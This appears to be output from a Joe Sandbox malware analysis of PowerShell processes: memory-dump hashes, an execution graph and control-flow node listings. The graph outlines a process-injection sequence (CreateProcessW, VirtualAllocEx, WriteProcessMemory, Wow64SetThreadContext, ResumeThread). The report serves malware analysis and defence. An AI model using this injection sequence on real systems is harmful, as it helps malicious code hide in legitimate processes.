                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1556306bbaafadb4a51e9a36cd3cb7f16eb38f893cfe047bdded5d812887dc2b
                                                                              • Instruction ID: 14cac7bd6452c6e1297568cc35d6e8da172971f906a073852b31a5565dab4b73
                                                                              • Opcode Fuzzy Hash: 1556306bbaafadb4a51e9a36cd3cb7f16eb38f893cfe047bdded5d812887dc2b
                                                                              • Instruction Fuzzy Hash: 4AF0C272006340AEE7108E16CD84BA2FFACEB51338F18C45AED480E286C2799845CAB0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$X=Zl$$^q$$^q
                                                                              • API String ID: 0-450762304
                                                                              • Opcode ID: ecfb6f92f2b1e1b9cfe5f5e021c9f185e3fccd057db5453a838c3c2e02ffdfbd
                                                                              • Instruction ID: f06a09e6f679ded23a200bf72cc3008338cc6222f79e66eb135f9646074074f1
                                                                              • Opcode Fuzzy Hash: ecfb6f92f2b1e1b9cfe5f5e021c9f185e3fccd057db5453a838c3c2e02ffdfbd
                                                                              • Instruction Fuzzy Hash: 495127B1B043098FDB2C9A39C8447AABBF6AFC1310F14846AD489CF655DB31D8C5CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: fb14e92bd8c8605a92c103278411d3d5c80e3ffb8e68d09266d048cc59be00a4
                                                                              • Instruction ID: 875eb07a69a0faf30f0ab4415b5e0cca18bb64b79e9d81bd1795b175aa34290c
                                                                              • Opcode Fuzzy Hash: fb14e92bd8c8605a92c103278411d3d5c80e3ffb8e68d09266d048cc59be00a4
                                                                              • Instruction Fuzzy Hash: 7A0149B0B493850FD72E12381C205666FBA6FC291032A84ABD085DF35BCE158C8A83A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                              • API String ID: 0-1420252700
                                                                              • Opcode ID: 4513388f03ee4765806cfb02385c6600b35f64597b0a40c93f1032c7fe57e808
                                                                              • Instruction ID: 1318031e67eb8ce75a0bfd2f2e88f11110e4ac5b987a87a2c5eb71dd393abd7f
                                                                              • Opcode Fuzzy Hash: 4513388f03ee4765806cfb02385c6600b35f64597b0a40c93f1032c7fe57e808
                                                                              • Instruction Fuzzy Hash: 1C1238B17043498FCB258B68981076ABFB2AFC6351F5988AAD505CF352DF32CD46C7A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47367f77185f50f8ccc51345f2094af38a7105db29b5474ff40a555ec8385f56
                                                                              • Instruction ID: 88bd5d06bbcf8083f9696d36e1511ccf04bd493d3dfe9d6dba3b3840cc489241
                                                                              • Opcode Fuzzy Hash: 47367f77185f50f8ccc51345f2094af38a7105db29b5474ff40a555ec8385f56
                                                                              • Instruction Fuzzy Hash: 84915A74A016458FCB15CF59C4989AEFBB1FF88310B248A99E815EB365C735FC91CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aa53856b9be04a9e826e57eb1542ec7fc853d74b2b50a6e285e3c9e898fac3e4
                                                                              • Instruction ID: 9933a6aadbefe76d33716317c4d05b3d668e1ea6d9736cb3c1cc634273a3c00a
                                                                              • Opcode Fuzzy Hash: aa53856b9be04a9e826e57eb1542ec7fc853d74b2b50a6e285e3c9e898fac3e4
                                                                              • Instruction Fuzzy Hash: 3F41CD7190F3D56FC703DF6C89A059ABFB0AF46204B0906D7D084CB2A3D634E949CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b8a1d2b35359500411f586fcb791db5c243c0644b9067ef58b49332c4f128f4
                                                                              • Instruction ID: b2daaebac195b5aad40e036d15d3e1347ab6077bfe85824dc530896f33e8bd0e
                                                                              • Opcode Fuzzy Hash: 9b8a1d2b35359500411f586fcb791db5c243c0644b9067ef58b49332c4f128f4
                                                                              • Instruction Fuzzy Hash: 0F4127F4B0030ADFDB258B258860A797BF2AF85390F9E8895D5049F256CB31DD45CBA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a441e461d4b8aba0831307918834b02300c8670a8a46d0b040478e87a90b7afe
                                                                              • Instruction ID: f210ef4a5976913d35fbb8a75893da86a9378cd4414a3e6539ad9f7bf7477e1b
                                                                              • Opcode Fuzzy Hash: a441e461d4b8aba0831307918834b02300c8670a8a46d0b040478e87a90b7afe
                                                                              • Instruction Fuzzy Hash: E44139B4A016059FCB0ACF58C5989AEFBB1FF48310B158A99D815AB364C736FC51CFA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f38508aa64a0b7009addd8c29a32db175393e93d769c416fc06e1ea2baffaf83
                                                                              • Instruction ID: fd1643046f711115e6c72d01bbe85ded44e1ce86de704c69ee77ca0fcca62067
                                                                              • Opcode Fuzzy Hash: f38508aa64a0b7009addd8c29a32db175393e93d769c416fc06e1ea2baffaf83
                                                                              • Instruction Fuzzy Hash: 8B218334B412448FC714CB6DD480AAABBE6EFC9314B1486A9D449DB365DB35FC02CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706989909.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_48d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e89cdea323b809144169333332dd05c2d4bc76e8aaf5c135cfebc8cc420c59c9
                                                                              • Instruction ID: 7ac687afa029fc1b0c2744a5a97bb34b4039ca3b02c3eb7c7e85f486aa817b65
                                                                              • Opcode Fuzzy Hash: e89cdea323b809144169333332dd05c2d4bc76e8aaf5c135cfebc8cc420c59c9
                                                                              • Instruction Fuzzy Hash: 4011E6B4A016199FCB04CF99D5809AEFBB1FF89310B1486A9E909EB355C731FD45CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706661409.00000000047BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_47bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 763a75a98ec1df24236bbb1ad422072b25d59b0fc312c21937447e2e0ed1fafb
                                                                              • Instruction ID: 571efce19b5a738cb6ffd2851cd446b7bdd076aa3ae8c666c4cdaa4898e068c2
                                                                              • Opcode Fuzzy Hash: 763a75a98ec1df24236bbb1ad422072b25d59b0fc312c21937447e2e0ed1fafb
                                                                              • Instruction Fuzzy Hash: 6701F7311097409AE7204E26D9847A7BF98EF41324F08C82AEC884A346C279A841CAF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1706661409.00000000047BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_47bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9d2828ad7a89f39469441eb78abe9e5db0aad1e4c4a3a6044b06ccb12b30fae3
                                                                              • Instruction ID: 5a86a8175831ce1ba73eed8da3f322cbaf5ec3191de87db917216a9ef7adc75c
                                                                              • Opcode Fuzzy Hash: 9d2828ad7a89f39469441eb78abe9e5db0aad1e4c4a3a6044b06ccb12b30fae3
                                                                              • Instruction Fuzzy Hash: 0201526100E3C05ED7124B259994752BFB4EF53224F1DC4DBD8888F293C2695849C7B2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1608119003
                                                                              • Opcode ID: e276b0e68015009897c4eccf073e4ef563274279a5c737353464641e689884fc
                                                                              • Instruction ID: a9816ee14c3b5b82b4d0bf8701fe287517541430e1f6cef1e253ebc86fdb230c
                                                                              • Opcode Fuzzy Hash: e276b0e68015009897c4eccf073e4ef563274279a5c737353464641e689884fc
                                                                              • Instruction Fuzzy Hash: BBF14AB5B043098FDB248B6898046AABBF6AFD5360F59887AD405CF351DE31DC46C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1608119003
                                                                              • Opcode ID: 399ab8c50b3344a7f7b83f1f442de312706a718cdc3c61c859a6f67942d346d7
                                                                              • Instruction ID: 542d06356be4a3d89781b4052aad5a15dd49003c350a3f41ce3ecda84a303985
                                                                              • Opcode Fuzzy Hash: 399ab8c50b3344a7f7b83f1f442de312706a718cdc3c61c859a6f67942d346d7
                                                                              • Instruction Fuzzy Hash: C1A138B17043568FCB258A799810A7ABFF6AFC5660F18887BD446CF252DA31CC45CBE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-1041444323
                                                                              • Opcode ID: 5fedf7af9b5d0891d540db14b40ac4c66d1d7130f6dd7305e3c496fe2a5f8248
                                                                              • Instruction ID: c85018e0f5f21f87f40aba704b871db819a5ba39c30dcf95d85834a6464d4c0f
                                                                              • Opcode Fuzzy Hash: 5fedf7af9b5d0891d540db14b40ac4c66d1d7130f6dd7305e3c496fe2a5f8248
                                                                              • Instruction Fuzzy Hash: 43210B71B4E7464FC72A19382824265AFF65FC2990B6948AFC041DF36ADE61CC4AC3D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1712593291.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_77d0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 5d01cd2595f87783b7cf42f6929d17e6226833f5b9d49132d84fc1e7cae107e5
                                                                              • Instruction ID: 70c7c12380d10d08f8d07d0c69f14d3dc25704fd46aa243f9b888d57ead8728b
                                                                              • Opcode Fuzzy Hash: 5d01cd2595f87783b7cf42f6929d17e6226833f5b9d49132d84fc1e7cae107e5
                                                                              • Instruction Fuzzy Hash: C8218EB1B04306DBDB34592E5C00B276BE69BC5750F64882AE405DF385ED32EC418362
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2468740936.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_318d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d5f4401f1956e2b1d56d9a0ec663156510656a7e16f724edd2d89fbfe7a46dea
                                                                              • Instruction ID: 69e83898ca39be923af3cc3953a4558efe4b249e35f7b189916b8597b6827757
                                                                              • Opcode Fuzzy Hash: d5f4401f1956e2b1d56d9a0ec663156510656a7e16f724edd2d89fbfe7a46dea
                                                                              • Instruction Fuzzy Hash: E001F7310093049BE714EB25ED84767FF98EF49324F1CC569EC484B286C779D881CAB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2468740936.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_318d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2afb070e45e6cbda80b9a1f98a98fb3f7b1e6efbf95904c4bdada69f150b0f8
                                                                              • Instruction ID: 86d447a8382bba5fa9b3dc0d2905306d501773f566948dfaf8062e651ef7ee81
                                                                              • Opcode Fuzzy Hash: c2afb070e45e6cbda80b9a1f98a98fb3f7b1e6efbf95904c4bdada69f150b0f8
                                                                              • Instruction Fuzzy Hash: D2012D6200E3C09FD7128B259C94B52BFB4EF47224F1D85CBD8888F1A7C2699849CB72
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2469949970.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_32b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eba1c840f046965727fa12c6becdc5d5014e780207999e0c1dc0b471ea1082c2
                                                                              • Instruction ID: 83da499ecc74b42cb0166685eae40bc5dd794915b94860cd5f6d35b6f8697672
                                                                              • Opcode Fuzzy Hash: eba1c840f046965727fa12c6becdc5d5014e780207999e0c1dc0b471ea1082c2
                                                                              • Instruction Fuzzy Hash: 35F0D435A001099FCB15CF9DD990AEEF7B1FF88324F248159E555A72A1C736AC62CB60

                                                                              Execution Graph

                                                                              Execution Coverage:6.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:33.9%
                                                                              Total number of Nodes:62
                                                                              Total number of Limit Nodes:5
                                                                              execution_graph 11548 4ba99a7 11549 4ba9991 11548->11549 11551 4ba9a4d 11549->11551 11553 4baa024 11549->11553 11550 4ba9aa5 11554 4baa382 11553->11554 11555 4baa3b9 11553->11555 11554->11555 11556 4baa3d4 11554->11556 11580 4baa024 8 API calls 11554->11580 11581 4baa3f0 11554->11581 11555->11550 11565 4baaaf4 11556->11565 11605 4ba8f44 11556->11605 11558 4baacd5 CreateProcessW 11561 4baad49 11558->11561 11559 4baa4f8 11560 4ba8f50 Wow64SetThreadContext 11559->11560 11559->11565 11562 4baa563 11560->11562 11563 4baa676 VirtualAllocEx 11562->11563 11562->11565 11577 4baa9e8 11562->11577 11564 4baa6c3 11563->11564 11564->11565 11566 4baa711 VirtualAllocEx 11564->11566 11568 4baa765 11564->11568 11565->11558 11565->11577 11566->11568 11567 4ba8f68 WriteProcessMemory 11569 4baa7af 11567->11569 11568->11565 11568->11567 11568->11577 11569->11565 11570 4baa8f9 11569->11570 11569->11577 11578 4ba8f68 WriteProcessMemory 11569->11578 11570->11565 11571 4ba8f68 WriteProcessMemory 11570->11571 11572 4baa922 11571->11572 11572->11565 11573 4ba8f74 Wow64SetThreadContext 11572->11573 11572->11577 11574 4baa997 11573->11574 11574->11565 11575 4baa99f 11574->11575 11576 4baa9a8 ResumeThread 11575->11576 11575->11577 11576->11577 11577->11550 11578->11569 11580->11554 11582 4baa3ee 11581->11582 11583 4ba8f44 CreateProcessW 11582->11583 11591 4baaaf4 11582->11591 11585 4baa4f8 11583->11585 11584 4baacd5 CreateProcessW 11587 4baad49 11584->11587 11585->11591 11609 4ba8f50 11585->11609 11588 4baa563 11589 4baa676 VirtualAllocEx 11588->11589 11588->11591 11603 4baa9e8 11588->11603 11590 4baa6c3 11589->11590 11590->11591 11592 4baa711 VirtualAllocEx 11590->11592 11594 4baa765 11590->11594 11591->11584 11591->11603 11592->11594 11594->11591 11594->11603 11613 4ba8f68 11594->11613 11595 4baa7af 11595->11591 11596 4baa8f9 11595->11596 11595->11603 11604 4ba8f68 WriteProcessMemory 11595->11604 11596->11591 11597 4ba8f68 WriteProcessMemory 11596->11597 11598 4baa922 11597->11598 11598->11591 11598->11603 11617 4ba8f74 11598->11617 11601 4baa99f 11602 4baa9a8 ResumeThread 11601->11602 11601->11603 11602->11603 11603->11554 11604->11595 11606 4baabf0 CreateProcessW 11605->11606 11608 4baad49 11606->11608 11610 4baae30 Wow64SetThreadContext 11609->11610 11612 4baaeaa 11610->11612 11612->11588 11614 4baafa8 WriteProcessMemory 11613->11614 11616 4bab033 11614->11616 11616->11595 11618 4baae30 Wow64SetThreadContext 11617->11618 11620 4baa997 11618->11620 11620->11591 11620->11601

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 575 4baa3f0-4baa3f5 576 4baa3f6-4baa425 575->576 578 4baa3ee 576->578 579 4baa426-4baa4a1 576->579 578->576 583 4baabd9-4baac69 579->583 584 4baa4a7-4baa4b7 579->584 590 4baac6b-4baac6e 583->590 591 4baac71-4baac78 583->591 588 4baa4b9-4baa4be 584->588 589 4baa4c0 584->589 592 4baa4c2-4baa4c4 588->592 589->592 590->591 593 4baac7a-4baac80 591->593 594 4baac83-4baac99 591->594 595 4baa4db-4baa4fa call 4ba8f44 592->595 596 4baa4c6-4baa4d9 592->596 593->594 598 4baac9b-4baaca1 594->598 599 4baaca4-4baad47 CreateProcessW 594->599 602 4baa4fc-4baa501 595->602 603 4baa503 595->603 596->595 598->599 606 4baad49-4baad4f 599->606 607 4baad50-4baadc8 599->607 605 4baa505-4baa507 602->605 603->605 608 4baab4f-4baab62 605->608 609 4baa50d-4baa522 605->609 606->607 626 4baadda-4baade1 607->626 627 4baadca-4baadd0 607->627 620 4baab69-4baab7f 608->620 615 4baab4a 609->615 616 4baa528-4baa54c 609->616 615->608 616->620 625 4baa552-4baa565 call 4ba8f50 616->625 620->583 633 4baab81-4baab8b 620->633 634 4baa56b-4baa572 625->634 635 4baaaed-4baaaef 625->635 630 4baadf8 626->630 631 4baade3-4baadf2 626->631 627->626 638 4baadf9 630->638 631->630 643 4baab8d-4baab94 633->643 644 4baab96-4baab98 633->644 636 4baa578-4baa582 634->636 637 4baaad3-4baaae6 634->637 636->620 640 4baa588-4baa5a5 636->640 637->635 638->638 640->615 642 4baa5ab-4baa5c5 call 4ba8f5c 640->642 652 4baa5cb-4baa5d2 642->652 653 4baaaf4 642->653 647 4baab9a-4baab9e 643->647 644->647 649 4baaba0 call 4ba9fbc 647->649 650 4baaba5-4baabb2 647->650 649->650 664 4baabb9-4baabd6 650->664 665 4baabb4 650->665 655 4baa5d8-4baa5e1 652->655 656 4baaab9-4baaacc 652->656 658 4baaafb 653->658 659 4baa64c-4baa652 655->659 660 4baa5e3-4baa627 655->660 656->637 666 4baab05 658->666 659->615 661 4baa658-4baa668 659->661 670 4baa629-4baa62f 660->670 671 4baa630-4baa63c 660->671 661->615 672 4baa66e-4baa6c1 VirtualAllocEx 661->672 665->664 673 4baab0c 666->673 670->671 671->658 674 4baa642-4baa646 671->674 679 4baa6ca-4baa6e8 672->679 680 4baa6c3-4baa6c9 672->680 678 4baab13 673->678 674->659 676 4baaa9f-4baaab2 674->676 676->656 683 4baab1a 678->683 679->666 682 4baa6ee-4baa6f5 679->682 680->679 686 4baa6fb-4baa702 682->686 687 4baa77c-4baa783 682->687 690 4baab21 683->690 686->673 689 4baa708-4baa70f 686->689 687->678 688 4baa789-4baa790 687->688 691 4baa796-4baa7b1 call 4ba8f68 688->691 692 4baaa85-4baaa98 688->692 689->687 693 4baa711-4baa763 VirtualAllocEx 689->693 697 4baab2b 690->697 691->683 702 4baa7b7-4baa7be 691->702 692->676 695 4baa76c-4baa776 693->695 696 4baa765-4baa76b 693->696 695->687 696->695 701 4baab32 697->701 706 4baab39 701->706 703 4baaa6b-4baaa7e 702->703 704 4baa7c4-4baa7cd 702->704 703->692 704->615 707 4baa7d3-4baa7d9 704->707 710 4baab43 706->710 707->615 709 4baa7df-4baa7ea 707->709 709->615 713 4baa7f0-4baa7f6 709->713 710->615 714 4baa8f9-4baa90a 713->714 715 4baa7fc-4baa801 713->715 714->615 719 4baa910-4baa924 call 4ba8f68 714->719 715->615 716 4baa807-4baa81a 715->716 716->615 720 4baa820-4baa833 716->720 719->701 724 4baa92a-4baa931 719->724 720->615 725 4baa839-4baa84e 720->725 726 4baaa37-4baaa4a 724->726 727 4baa937-4baa93d 724->727 725->690 732 4baa854-4baa858 725->732 744 4baaa51-4baaa64 726->744 727->615 728 4baa943-4baa954 727->728 728->706 733 4baa95a-4baa95e 728->733 734 4baa85e-4baa867 732->734 735 4baa8df-4baa8e2 732->735 737 4baa969-4baa971 733->737 738 4baa960-4baa963 733->738 734->615 740 4baa86d-4baa870 734->740 735->615 739 4baa8e8-4baa8eb 735->739 737->615 741 4baa977-4baa981 737->741 738->737 739->615 742 4baa8f1-4baa8f3 739->742 740->615 743 4baa876-4baa8a6 740->743 741->620 745 4baa987-4baa999 call 4ba8f74 741->745 742->714 742->715 743->615 753 4baa8ac-4baa8c5 call 4ba8f68 743->753 744->703 745->710 750 4baa99f-4baa9a6 745->750 754 4baa9a8-4baa9e6 ResumeThread 750->754 755 4baaa03-4baaa16 750->755 759 4baa8ca-4baa8cc 753->759 757 4baa9e8-4baa9ee 754->757 758 4baa9ef-4baa9fc 754->758 762 4baaa1d-4baaa30 755->762 757->758 761 4baa9fe 758->761 758->762 759->697 763 4baa8d2-4baa8d9 759->763 761->665 762->726 763->735 763->744
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04BAA6AA
                                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04BAA74C
                                                                                • Part of subcall function 04BA8F68: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18822514,00000000,?,?,?,00000000,00000000,?,04BAA7AF,?,00000000,?), ref: 04BAB024
                                                                              • ResumeThread.KERNELBASE(?), ref: 04BAA9CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                              • String ID:
                                                                              • API String ID: 2390764575-0
                                                                              • Opcode ID: 652399de81152bdf3913651cf2ab2955aaffa07a8b2a5025704d1da225d74811
                                                                              • Instruction ID: b932b7beec1c2b3ce3a0ba5bd4cfe440eb251e1161a1453c9fa50e83523b07a6
                                                                              • Opcode Fuzzy Hash: 652399de81152bdf3913651cf2ab2955aaffa07a8b2a5025704d1da225d74811
                                                                              • Instruction Fuzzy Hash: 6842D070A042198FDB24DF69C854B9EB7F2EF88304F1085E9D409AB390DB30AE95CF61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 76e1358-76e137b 1 76e1556-76e159b 0->1 2 76e1381-76e1386 0->2 12 76e16f2-76e173e 1->12 13 76e15a1-76e15a6 1->13 3 76e139e-76e13a2 2->3 4 76e1388-76e138e 2->4 5 76e13a8-76e13ac 3->5 6 76e1503-76e150d 3->6 8 76e1392-76e139c 4->8 9 76e1390 4->9 10 76e13ae-76e13bd 5->10 11 76e13bf 5->11 14 76e150f-76e1518 6->14 15 76e151b-76e1521 6->15 8->3 9->3 16 76e13c1-76e13c3 10->16 11->16 32 76e18ab-76e18e0 12->32 33 76e1744-76e1749 12->33 17 76e15be-76e15c2 13->17 18 76e15a8-76e15ae 13->18 20 76e1527-76e1533 15->20 21 76e1523-76e1525 15->21 16->6 25 76e13c9-76e13e9 16->25 23 76e169f-76e16a9 17->23 24 76e15c8-76e15ca 17->24 27 76e15b2-76e15bc 18->27 28 76e15b0 18->28 22 76e1535-76e1553 20->22 21->22 34 76e16ab-76e16b4 23->34 35 76e16b7-76e16bd 23->35 30 76e15cc-76e15d8 24->30 31 76e15da 24->31 63 76e13eb-76e1406 25->63 64 76e1408 25->64 27->17 28->17 37 76e15dc-76e15de 30->37 31->37 57 76e18e2-76e18ee 32->57 58 76e18f0 32->58 40 76e174b-76e1751 33->40 41 76e1761-76e1765 33->41 42 76e16bf-76e16c1 35->42 43 76e16c3-76e16cf 35->43 37->23 44 76e15e4-76e15e8 37->44 46 76e1755-76e175f 40->46 47 76e1753 40->47 49 76e185a-76e1864 41->49 50 76e176b-76e176d 41->50 48 76e16d1-76e16ef 42->48 43->48 53 76e15ea-76e1606 44->53 54 76e1608 44->54 46->41 47->41 59 76e1866-76e186f 49->59 60 76e1872-76e1878 49->60 51 76e176f-76e177b 50->51 52 76e177d 50->52 69 76e177f-76e1781 51->69 52->69 67 76e160a-76e160c 53->67 54->67 70 76e18f2-76e18f4 57->70 58->70 65 76e187e-76e188a 60->65 66 76e187a-76e187c 60->66 77 76e140a-76e140c 63->77 64->77 75 76e188c-76e18a8 65->75 66->75 67->23 76 76e1612-76e1625 67->76 69->49 71 76e1787-76e1789 69->71 73 76e196e-76e1978 70->73 74 76e18f6-76e18f8 70->74 84 76e178b-76e1797 71->84 85 76e1799 71->85 80 76e197a-76e1980 73->80 81 76e1983-76e1989 73->81 86 76e18fa-76e1906 74->86 87 76e1908 74->87 105 76e162b-76e162d 76->105 77->6 83 76e1412-76e1414 77->83 89 76e198f-76e199b 81->89 90 76e198b-76e198d 81->90 92 76e1416-76e1422 83->92 93 76e1424 83->93 95 76e179b-76e179d 84->95 85->95 96 76e190a-76e190c 86->96 87->96 98 76e199d-76e19b6 89->98 90->98 99 76e1426-76e1428 92->99 93->99 95->49 100 76e17a3-76e17a5 95->100 96->73 101 76e190e-76e1914 96->101 99->6 106 76e142e-76e144e 99->106 108 76e17bf-76e17c3 100->108 109 76e17a7-76e17ad 100->109 102 76e1916-76e1918 101->102 103 76e1922-76e192b 101->103 102->103 110 76e192d-76e192f 103->110 111 76e1939-76e1956 103->111 113 76e162f-76e1635 105->113 114 76e1645-76e169c 105->114 134 76e1466-76e146a 106->134 135 76e1450-76e1456 106->135 117 76e17dd-76e1857 108->117 118 76e17c5-76e17cb 108->118 115 76e17af 109->115 116 76e17b1-76e17bd 109->116 110->111 130 76e1958-76e1968 111->130 131 76e19b9-76e19be 111->131 119 76e1639-76e163b 113->119 120 76e1637 113->120 115->108 116->108 123 76e17cf-76e17db 118->123 124 76e17cd 118->124 119->114 120->114 123->117 124->117 130->73 131->130 140 76e146c-76e1472 134->140 141 76e1484-76e1488 134->141 138 76e145a-76e145c 135->138 139 76e1458 135->139 138->134 139->134 142 76e1476-76e1482 140->142 143 76e1474 140->143 144 76e148f-76e1491 141->144 142->141 143->141 146 76e14a9-76e1500 144->146 147 76e1493-76e1499 144->147 148 76e149d-76e149f 